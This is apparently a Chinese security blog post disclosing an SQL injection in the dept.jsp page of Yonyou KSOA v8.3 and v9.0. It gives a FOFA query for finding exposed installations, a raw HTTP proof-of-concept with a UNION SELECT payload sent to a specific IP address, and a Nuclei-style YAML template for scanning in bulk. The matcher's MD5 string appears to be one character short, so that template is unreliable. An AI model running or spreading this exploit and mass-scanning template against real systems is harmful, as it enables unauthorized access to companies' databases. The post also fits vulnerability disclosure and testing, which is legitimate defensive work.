用友时空KSOA dept.jsp SQL注入漏洞

漏洞简介

用友时空KSOA是建立在SOA理念指导下研发的新一代产品,是根据流通企业最前沿的I需求推出的统一的IT基础架构,它可以让流通企业各个时期建立的IT系统之间彼此轻松对话,帮助流通企业保护原有的IT投资,简化IT管理,提升竞争能力,确保企业整体的战略目标以及创新活动的实现。
系统dept.jsp文件中参数存在SQL注入漏洞

影响版本

用友时空 KSOA v9.0 v8.3

漏洞复现

fofa语法:app="用友-时空KSOA"
登录页面如下:

POC:

GET /common/dept.jsp?deptid=1%27%20UNION%20ALL%20SELECT%2060%2Csys.fn_sqlvarbasetostr(HASHBYTES(%27MD5%27%2C%2712345%27))-- HTTP/1.1
Host: 101.75.85.36:8098
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36
Connection: close


批量yaml文件

id: yonyou_KOSA_dept_sqli
info:
  name: 用友时空KSOA dept.jsp SQL注入漏洞
  author: mhb17
  severity: info
  description: description
  reference:
    - https://
  tags: sqli
requests:
  - raw:
      - |+
        GET /common/dept.jsp?deptid=1%27%20UNION%20ALL%20SELECT%2060%2Csys.fn_sqlvarbasetostr(HASHBYTES(%27MD5%27%2C%2712345%27))-- HTTP/1.1
        Host: {{Hostname}}
        Upgrade-Insecure-Requests: 1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36
        Connection: close

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '827ccb0eea8a706c4c34a16891f84e7'
      - type: word
        part: header
        words:
          - '200'
posted @ 2023-10-19 22:20  学安全的小白  阅读(267)  评论(0编辑  收藏  举报